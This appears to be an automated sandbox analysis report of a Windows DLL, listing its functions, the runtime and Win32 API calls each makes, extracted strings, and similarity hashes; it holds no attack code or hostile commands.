Part of subcall function 6EA112B0: SendMessageW.USER32(?,0000000F,?,00000000), ref: 6EA1137F
Part of subcall function 6EA112B0: SetBkMode.GDI32(?,00000001), ref: 6EA11388
Part of subcall function 6EA112B0: SetTextColor.GDI32(?,00FFFFFF), ref: 6EA11394
Part of subcall function 6EA112B0: GetClientRect.USER32 ref: 6EA113A6
Part of subcall function 6EA112B0: ClientToScreen.USER32(?,?), ref: 6EA113B4
Part of subcall function 6EA112B0: ClientToScreen.USER32(?,?), ref: 6EA113C9
Part of subcall function 6EA112B0: ClientToScreen.USER32(?,?), ref: 6EA113EB

DeleteObject.GDI32(?), ref: 6EA104A0

Strings

Arial, xrefs: 6EA1041E

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Client$CreateObjectScreen$CompatibleMessageRectSelectSend$BeginBitmapCapsColorDeleteDeviceFontModePaintParentReleaseTextTimer
String ID: Arial
API String ID: 1525433823-493054409
Opcode ID: 5aa0e312809fd896f139547b3e08930bf173c4036d42df54c00ddf5eb86e4850
Instruction ID: a7647b02fd546192c019e7735429b0cdb8fcea2d18c1f3f41ed4351756aebe72
Opcode Fuzzy Hash: 5aa0e312809fd896f139547b3e08930bf173c4036d42df54c00ddf5eb86e4850
Instruction Fuzzy Hash: 7A31E431244705AFEB609FA8DC85B9A77A5FB56321F108112F505DA2E0D7B1ECB2CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA28836, Relevance: 15.1, APIs: 10, Instructions: 70COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA2884C

Part of subcall function 6EA28252: HeapFree.KERNEL32(00000000,00000000,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?), ref: 6EA28268
Part of subcall function 6EA28252: GetLastError.KERNEL32(?,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?,?), ref: 6EA2827A

_free.LIBCMT ref: 6EA28858
_free.LIBCMT ref: 6EA28863
_free.LIBCMT ref: 6EA2886E
_free.LIBCMT ref: 6EA28879
_free.LIBCMT ref: 6EA28884
_free.LIBCMT ref: 6EA2888F
_free.LIBCMT ref: 6EA2889A
_free.LIBCMT ref: 6EA288A5
_free.LIBCMT ref: 6EA288B3

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 50c0dedc72bc8c1ffc6054799a9f43881a311ba6f46842139ab9dcc925e67710
Instruction ID: 9a9b4e841c85c9181815c02bb6068fe8700e4e1eeb6e0f76beb28388ad05dc08
Opcode Fuzzy Hash: 50c0dedc72bc8c1ffc6054799a9f43881a311ba6f46842139ab9dcc925e67710
Instruction Fuzzy Hash: E021EB76900108AFCB05DFD4C980DDE7BB9FF48244F0449B6F929AB160EB35DA94CB84

Uniqueness

Uniqueness Score: -1.00%

Function 6EA17520, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,6EA0ABAD,6EA0ABAC,00000000,00000000,00000000,00000000,065D8F34,00000000,?,00000000,6EA0ABAD,?,?), ref: 6EA17593
WideCharToMultiByte.KERNEL32(00000000,00000000,6EA0ABAD,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6EA175CA

Strings

@Mt, xrefs: 6EA17601, 6EA17622

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID: @Mt
API String ID: 626452242-1491384996
Opcode ID: c97faea24f5bf102c8bfff8bf2fbd8f4780679a966ef7af3c140124cac1745d8
Instruction ID: b0ba191f25c71c495aad4dbd233f26456838a409fd8e8b8855cbb6821908b036
Opcode Fuzzy Hash: c97faea24f5bf102c8bfff8bf2fbd8f4780679a966ef7af3c140124cac1745d8
Instruction Fuzzy Hash: 78318276648305ABDB10CFE4CC45FEB77ACEB41B64F144529F919EB2C0D7319941C6A8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0D3E0, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 100libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,065D8F34,?,?,?,6EA38C60,000000FF), ref: 6EA0D419
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6EA0D429
GetModuleHandleW.KERNEL32(Advapi32.dll,065D8F34,?,?,?,6EA38C60,000000FF), ref: 6EA0D489
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 6EA0D499
RegDeleteKeyW.ADVAPI32(?,?), ref: 6EA0D4E8

Strings

Advapi32.dll, xrefs: 6EA0D414, 6EA0D484
RegDeleteKeyExW, xrefs: 6EA0D493
RegDeleteKeyTransactedW, xrefs: 6EA0D423

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc$Delete
String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 2668475584-1053001802
Opcode ID: 24393765d0b7e5aba51481521bf925eb8d0cc5bebdc18ca51e763a2e5d1f1f2a
Instruction ID: 41f4f8dfe47a8d27a155e0e1156996caf7f019277ec5f49d91ed70b196b6eeb8
Opcode Fuzzy Hash: 24393765d0b7e5aba51481521bf925eb8d0cc5bebdc18ca51e763a2e5d1f1f2a
Instruction Fuzzy Hash: 5231D236608604EFEB21CF98E804B55BBA4FB46720F04C12AF905EB680D777B491CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA17132, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,6EA17478,6EA4DBA8,?,00000000,?,6EA1204A,?,?,00000000,?,?,C000008C), ref: 6EA17144
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,6EA17478,6EA4DBA8,?,00000000,?,6EA1204A,?,?,00000000), ref: 6EA17159
DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,C000008C), ref: 6EA171D5

Strings

AtlThunk_DataToCode, xrefs: 6EA17198
atlthunk.dll, xrefs: 6EA17154
AtlThunk_FreeData, xrefs: 6EA171AF
AtlThunk_InitData, xrefs: 6EA17181
AtlThunk_AllocateData, xrefs: 6EA1716A

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: ba6e977e9ba65b67c11eee23920fba26856045ad73fcd5ce1f8f9a4056bd6849
Instruction ID: 77da06c5a21b94e9279f84ace413e4c99cf9fdd9c740d4ec1e9a8070cfcebe2e
Opcode Fuzzy Hash: ba6e977e9ba65b67c11eee23920fba26856045ad73fcd5ce1f8f9a4056bd6849
Instruction Fuzzy Hash: 14018431408A31AECF02AA90CC15FC53B5A6F13289F545050BC45FE7E5DB669ACACE9D

Uniqueness

Uniqueness Score: -1.00%

Function 6EA33837, Relevance: 13.7, APIs: 9, Instructions: 201COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA338A5
_free.LIBCMT ref: 6EA338B1
_free.LIBCMT ref: 6EA339DA
_free.LIBCMT ref: 6EA339E5

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 629e48ee19b691178c6b0f26bf293ff05541644b1740c0042e63d328676c5435
Instruction ID: f9723c6af888dac2ba64bbd517f5153cff4cd777f6024bce6d52defa5ef7fbc4
Opcode Fuzzy Hash: 629e48ee19b691178c6b0f26bf293ff05541644b1740c0042e63d328676c5435
Instruction Fuzzy Hash: 35611771904715DFD710CFE8C840B9AB7F9EF45310F284969E9A9EB284E7319C84CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2E483, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 319fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6EA2E4CB
__fassign.LIBCMT ref: 6EA2E6AA
__fassign.LIBCMT ref: 6EA2E6C7
WriteFile.KERNEL32(?,6EA2685B,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EA2E70F
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6EA2E74F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EA2E7FB

Strings

@Mt, xrefs: 6EA2E7FB

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID: @Mt
API String ID: 4031098158-1491384996
Opcode ID: 23e1456a16301933ed5beb76b5c6504f511e7a577657782e29db46ece0a07d83
Instruction ID: 2f97c3781b3be9ac42af422a1b0eb9696ac7580944b7d858ab7074670d6ba775
Opcode Fuzzy Hash: 23e1456a16301933ed5beb76b5c6504f511e7a577657782e29db46ece0a07d83
Instruction Fuzzy Hash: B1D1BB71D002589FDF12CFE8C9809EDBBB5AF49314F28816AE855BB241E731A986CF54

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2CB41, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 78COMMON

Download Yara Rule

Strings

ext-ms-, xrefs: 6EA2CBAC
@Mt, xrefs: 6EA2CB8B
api-ms-, xrefs: 6EA2CB98

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: @Mt$api-ms-$ext-ms-
API String ID: 0-3879450930
Opcode ID: eaf69bdb35fe1b99e337f5583371773dbd9d5c4e77abad4ba2f9b97d86173b8b
Instruction ID: 69f64edb9e25798346a4162b1a9a41f2160d62bbb1a2c124f063d970253cd77f
Opcode Fuzzy Hash: eaf69bdb35fe1b99e337f5583371773dbd9d5c4e77abad4ba2f9b97d86173b8b
Instruction Fuzzy Hash: 0821A872945725AFDB618AA98C84A4A77689F02760F3D4531FC19FF280D632DD81C6D8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA19ACC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6EA181BC,6EA14296,6EA14919,?,6EA14B51,?,00000001,?,?,00000001,?,6EA49E00,0000000C,6EA14C4A), ref: 6EA19ADA
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6EA19AE8
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6EA19B01
SetLastError.KERNEL32(00000000,6EA14B51,?,00000001,?,?,00000001,?,6EA49E00,0000000C,6EA14C4A,?,00000001,?), ref: 6EA19B53

Strings

@Mt, xrefs: 6EA19ADA

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID: @Mt
API String ID: 3852720340-1491384996
Opcode ID: 9574b0d16c3f53c69fe942c22c11ec543d8e780c97689e82066bf00b603b26c1
Instruction ID: d2e60e50d87dadfedbec70362c02ba240a1c908a719dc8409970a7029a347bbc
Opcode Fuzzy Hash: 9574b0d16c3f53c69fe942c22c11ec543d8e780c97689e82066bf00b603b26c1
Instruction Fuzzy Hash: 47014C3222EB119EBB4119F46E84AC62769DF03BBD720823DF5145E0E0EF124C8AD648

Uniqueness

Uniqueness Score: -1.00%

Function 6EA16D5F, Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 6EA16DA8
__alloca_probe_16.LIBCMT ref: 6EA16DD4
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 6EA16E13
LCMapStringEx.KERNEL32 ref: 6EA16E30
LCMapStringEx.KERNEL32 ref: 6EA16E6F
__alloca_probe_16.LIBCMT ref: 6EA16E8C
LCMapStringEx.KERNEL32 ref: 6EA16ECE
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6EA16EF1

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: a9c38b03f68b4a7e8a5d30ba7690525a40ee3e347b5883fefce0c46151864682
Instruction ID: 0308deca000c083fa69e7943c8ec0f033795112f1518e4d8202e39cac324e931
Opcode Fuzzy Hash: a9c38b03f68b4a7e8a5d30ba7690525a40ee3e347b5883fefce0c46151864682
Instruction Fuzzy Hash: A251C372518216AFEF108FE4CC54FEB3BA9EF85754F154528F924EA290D734CC918B98

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1723E, Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6EA173E8,00000000), ref: 6EA17262
HeapAlloc.KERNEL32(00000000), ref: 6EA17269

Part of subcall function 6EA17334: IsProcessorFeaturePresent.KERNEL32(0000000C,6EA17250,00000000,?,6EA173E8,00000000), ref: 6EA17336

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,6EA173E8,00000000), ref: 6EA17279
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 6EA172A0
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000), ref: 6EA172B4
InterlockedPopEntrySList.KERNEL32(00000000), ref: 6EA172C7
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6EA172DA

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: 264d9f9e671bbb1afbd3ad702f5cfc07cead00b4d08442c2b64f45e857c602a1
Instruction ID: b1dfbcf85b24af4228deead3e2936272ca60f08cb9cf7fe254629a701b9077ab
Opcode Fuzzy Hash: 264d9f9e671bbb1afbd3ad702f5cfc07cead00b4d08442c2b64f45e857c602a1
Instruction Fuzzy Hash: DF110B75648F21ABDF3116E9CC48FEA322EEB47745F145420FD04FA180CA61CC838AA9

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2A54F, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2897C: GetLastError.KERNEL32(00000000,00000000,00000004,6EA1B7B1,00000000,00000000,00000000,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28981
Part of subcall function 6EA2897C: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28A1F

_free.LIBCMT ref: 6EA2A85C
_free.LIBCMT ref: 6EA2A875
_free.LIBCMT ref: 6EA2A8B5
_free.LIBCMT ref: 6EA2A8BE
_free.LIBCMT ref: 6EA2A8CA

Strings

C, xrefs: 6EA2A6AB

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 5aadb022be29a4c7f7ad4703819e4d4c4d6a7103a3900f03e625936124c10650
Instruction ID: e2321c162638180abe6986cc827dcfb3a53c4122b8949ca73449517f3a0e9de7
Opcode Fuzzy Hash: 5aadb022be29a4c7f7ad4703819e4d4c4d6a7103a3900f03e625936124c10650
Instruction Fuzzy Hash: 9AB15875A0121A9FDB24DF58C994A9DB7B5FF48304F1885EAE819A7350E730AED0CF44

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0FE30, Relevance: 10.8, APIs: 7, Instructions: 263COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6EA4E328,065D8F34), ref: 6EA0FE8D
GetModuleFileNameW.KERNEL32(?,00000104), ref: 6EA0FF10
LoadTypeLib.OLEAUT32(?,00000000), ref: 6EA0FF37
LoadRegTypeLib.OLEAUT32(6EA46478,00000000,00000000,?,00000000), ref: 6EA0FF52
EnterCriticalSection.KERNEL32(6EA4E344), ref: 6EA10115
LeaveCriticalSection.KERNEL32(6EA4E344), ref: 6EA1012B

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLoadType$FileLeaveModuleName
String ID:
API String ID: 1976781235-0
Opcode ID: 583f4a4257e16a7088f71edb999340ba71c57d20d10d7f03b9154bf3154503f8
Instruction ID: b5f40ca5c80ce952ef7f6761f3d94e02ed37c3b03f2b7622feb4590de5138e30
Opcode Fuzzy Hash: 583f4a4257e16a7088f71edb999340ba71c57d20d10d7f03b9154bf3154503f8
Instruction Fuzzy Hash: 20B16C74905229DFDB10DBA4C988B9AB7F5BF4A304F2580D9E809EB340DB359E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0DCB0, Relevance: 10.7, APIs: 7, Instructions: 163libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000060), ref: 6EA0DD3D
LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 6EA0DD4F
FindResourceW.KERNEL32(00000000,?,?), ref: 6EA0DD76
LoadResource.KERNEL32(00000000,00000000), ref: 6EA0DD8E

Part of subcall function 6EA0D340: GetLastError.KERNEL32(80070057,8007000E,80004005), ref: 6EA0D340

FreeLibrary.KERNEL32(00000000,00000000,?), ref: 6EA0DE7F

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$Resource$ErrorFindFreeLast
String ID:
API String ID: 328770362-0
Opcode ID: 2b4bdb132d17293d269bfe28728d733a902c1a6e7b86d5b5f85bf0e4bfbe30fd
Instruction ID: 633faa9f127551d0636a7671270cd189e5e82a678b7b8104e0866f421d58fb0d
Opcode Fuzzy Hash: 2b4bdb132d17293d269bfe28728d733a902c1a6e7b86d5b5f85bf0e4bfbe30fd
Instruction Fuzzy Hash: 335105B2A002199FCB21CB94DC40BDEB7B9EF99718F504159F608A7280DB349E85CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 6EA18230, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6EA18267
___except_validate_context_record.LIBVCRUNTIME ref: 6EA1826F
_ValidateLocalCookies.LIBCMT ref: 6EA182F8
__IsNonwritableInCurrentImage.LIBCMT ref: 6EA18323
_ValidateLocalCookies.LIBCMT ref: 6EA18378

Strings

csm, xrefs: 6EA1830D

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 549e46e9b97f79b8165e65ab5ed7d3814539cd5217159c52b7f2e56a8bceaf0a
Instruction ID: 350e4dab8d3d0610163af758e92b979c38bcebc3160bd5219a1e37f33a1379b4
Opcode Fuzzy Hash: 549e46e9b97f79b8165e65ab5ed7d3814539cd5217159c52b7f2e56a8bceaf0a
Instruction Fuzzy Hash: E441E434A08619DFCF00CFA9C890ADEBBB6BF45328F148155E8289F351C7319D85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 6EA122B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,00000024,00000000), ref: 6EA12340
GetWindowLongW.USER32(?,000000FC), ref: 6EA12354
CallWindowProcW.USER32(?,?,00000082,00000024,00000000), ref: 6EA1236A
GetWindowLongW.USER32(?,000000FC), ref: 6EA12383
SetWindowLongW.USER32 ref: 6EA12392

Strings

$, xrefs: 6EA122F4

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: 0b0da47f5d06c55f476106dc7f81e03b3a4121ef360e5dfcde780fd8437ae6bb
Instruction ID: 986975d1d2e9f4e3fe92d35b4f10311f8282624c40584cdb669f0d40742c9fc8
Opcode Fuzzy Hash: 0b0da47f5d06c55f476106dc7f81e03b3a4121ef360e5dfcde780fd8437ae6bb
Instruction Fuzzy Hash: F1411671904708AFCB20CF99C884A9EBBF5FF49310F108A1DE856A72A0D731E954DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0D510, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,065D8F34), ref: 6EA0D564
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6EA0D57B
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000,065D8F34), ref: 6EA0D5B0
RegCloseKey.ADVAPI32(00000000), ref: 6EA0D5C3

Strings

Advapi32.dll, xrefs: 6EA0D55F
RegOpenKeyTransactedW, xrefs: 6EA0D575

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 823179699-3913318428
Opcode ID: 9b77c242050402cf474dc2dcc6adaa0ffc23aa2f82e6ee72f702beca06d43cb9
Instruction ID: 0e5fa170531c805a2471bd9f7a09e2e1d4d8b91de44a257ff38cf01a9131ee87
Opcode Fuzzy Hash: 9b77c242050402cf474dc2dcc6adaa0ffc23aa2f82e6ee72f702beca06d43cb9
Instruction Fuzzy Hash: 79317371A04615EFDF10CF99DC44BABBBB9FB49718F104529F815EB280D734A940CB64

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2BE3B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

@Mt, xrefs: 6EA2BE9B, 6EA2BEE1
C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6EA2BE40

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: @Mt$C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-676890933
Opcode ID: 1379fd29b41855162281ccba1f0ebb9d2f8c51626ce4dc4d7723e37d6842a184
Instruction ID: 792bf874910bd95d20421c5c8b1cd50e165502c0de38207477aff63779083903
Opcode Fuzzy Hash: 1379fd29b41855162281ccba1f0ebb9d2f8c51626ce4dc4d7723e37d6842a184
Instruction Fuzzy Hash: 9E219571604216BFDB109FE68D8089B77ADEF4136871D8A34F618B7558DB30EDC18768

Uniqueness

Uniqueness Score: -1.00%

